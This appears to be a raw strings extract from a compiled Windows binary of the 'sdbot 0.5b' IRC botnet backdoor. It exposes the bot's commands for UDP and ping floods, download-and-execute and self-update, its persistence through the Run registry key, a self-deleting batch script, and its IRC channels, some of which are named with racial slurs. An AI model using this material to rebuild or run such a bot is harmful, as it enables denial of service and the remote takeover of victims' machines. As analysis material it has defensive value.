!This program cannot be run in DOS mode. .text .data .idata ICMP.DLL IcmpCreateFile IcmpCloseHandle IcmpSendEcho kernel32.dll RegisterServiceProcess CreateToolhelp32Snapshot Process32First Process32 Next Mozilla/4.0 (compatible) WININET.DLL InternetGetConnectedState InternetGetConnectedStateEx Software\Microsoft\Windows\CurrentVersion\Run main thread mode $chan +o $user action $chan smacks $1 smack udp $1 10000 2048 50 ping $1 10000 $2 50 raw PRIVMSG $1 :$chr(1)$2-$chr(1) bot started. j?hCv@ $j?hIv@ j?hgv@ j?hCv@ j?hIv@ [%d-%d-%d %d:%d:%d] %s connected to %s. %d, %d : USERID : UNIX : %s NICK %s USER %s 0 0 :%s JOIN %s %s USERHOST %s screw you %s! user %s logged out. NOTICE %s :%s PRIVMSG NOTICE VERSION NOTICE %s : VERSION %s login user %s(%s) logged in. password accepted. $user $chan $rndnick $server $chr( rndnick NICK %s logout user %s logged out. reconnect QUIT :reconnecting disconnect QUIT :later QUIT :%s QUIT :later status sdbot 0.5b ready. Up %dd %dh %dm. about sdbot 0.5b by [sd] (sdbot@mail.ru). homepage: http://sdbot.n3.net/ threads -[thread list]- %d. %s aliases -[alias list]- %d. %s = %s netinfo sysinfo remove PART %s killthread thread(s) killed. c_quit c_rndnick NICK %s prefix file opened. couldn't open file. server %s -> %s couldn't resolve host visit addalias privmsg action ACTION %s cycle MODE %s repeat c_raw c_mode MODE %s c_nick c_join JOIN %s %s c_part PART %s %s %s %s :%s delay update %s\%s.exe update (%s) downloading update from %s... execute couldn't execute file. clone clone (%s) clone created on %s:%d, in channel %s. download download (%s) downloading %s... redirect redirect (%d->%s:%d) redirect created on port %d to %s:%d. c_privmsg [%s] <%s> %s c_action [%s] * %s %s udp (%s) sending %d udp packets to: %s. packet size: %d, delay: %d[ms]. ping (%s) sending %d pings to %s. packet size: %d, timeout: %d[ms] icmp.dll not available spy (%s) spy created on %s:%d, in channel %s. removing bot... joined channel %s. PONG %s h2"@ XZh2"@ Phg"@ Whu"@ Rh2v@ tAh4"@ $h'#@ ShK#@ Phe#@ $h>%@ (Sh{&@ Sh0g@ Vh%'@ Vh0g@ Vh\a@ Phu"@ @Ph#)@ ACTION ACTION [%s]: * %s %s [%s]: <%s> %s [%s]: %s sets mode: %s [%s]: %s is now known as %s. [%s]: %s has quit(%s). wtf %s? [%s]: %s has left %s. [%s]: %s has joined %s. [%s]: nick %s already in use. [%s]: Users in %s: %s u$h/X@ u$hLX@ PhcX@ B@RPRh @Ph#)@ %s %s :%s %s%s%s Phx_@ PRIVMSG %s :finished sending packets to %s. PRIVMSG %s :error sending packets to %s. Ph0a@ PRIVMSG %s :finished sending pings to %s. PRIVMSG %s :error sending pings to %s. file download (%s - %dkb transferred) downloaded %.1f kb to %s @ %.1f kb/sec. PRIVMSG %s :opened %s. downloaded %.1f kb to %s @ %.1f kb/sec. updating... update failed: error executing file. update (%s - %dkb transferred) PRIVMSG %s :couldn't open %s. bad url, or dns error. WhP%@ $hPf@ dial-up connection type: %s (%s). local IP address: %d.%d.%d.%d. connected from: %s cpu: %dMHz. ram: %dKB total, %dKB free. os: Windows %s (%d.%d, build %d). uptime: %dd %dh %dm %s [%s] WVSPP invalid URL. url visited. error visiting URL. %s\r.bat @echo off :start if not exist ""%1"" goto done del /F ""%1"" del ""%1"" goto start :done del /F %temp% del %temp% %%comspec%% /c %s %s jihpt@ nigga2 exploitlabs.com #0sec nigger exploitlabs.com #whore nigger Proc32.exe Critical Process Monitor mIRC v6.03 Khaled Mardam-Bey <"tx < tf< t < tV < t < tJ < tF -LIBGCCW32-EH-SJLJ-GTHR-MINGW32 RegCloseKey RegCreateKeyExA RegDeleteValueA RegSetValueExA AddAtomA CloseHandle CopyFileA CreateFileA CreateProcessA CreateThread ExitProcess ExpandEnvironmentStringsA FindAtomA GetAtomNameA GetCommandLineA GetLocalTime GetModuleFileNameA GetModuleHandleA GetProcAddress GetStartupInfoA GetSystemDirectoryA GetTempPathA GetTickCount GetVersionExA GlobalMemoryStatus LoadLibraryA SetUnhandledExceptionFilter Sleep TerminateThread WriteFile __getmainargs __p__environ __p__fmode __set_app_type _cexit _fileno _onexit _setmode abort atexit malloc signal sprintf srand strcat strchr strcmp strncmp strncpy strstr strtok ShellExecuteA HttpOpenRequestA HttpSendRequestA InternetCloseHandle InternetConnectA InternetCrackUrlA InternetOpenA InternetOpenUrlA InternetReadFile WSAAsyncSelect WSACleanup WSAStartup accept closesocket connect gethostbyaddr gethostbyname getsockname htons inet_addr inet_ntoa listen sendto socket ADVAPI32.DLL KERNEL32.dll msvcrt.dll SHELL32.DLL WININET.DLL WSOCK32.DLL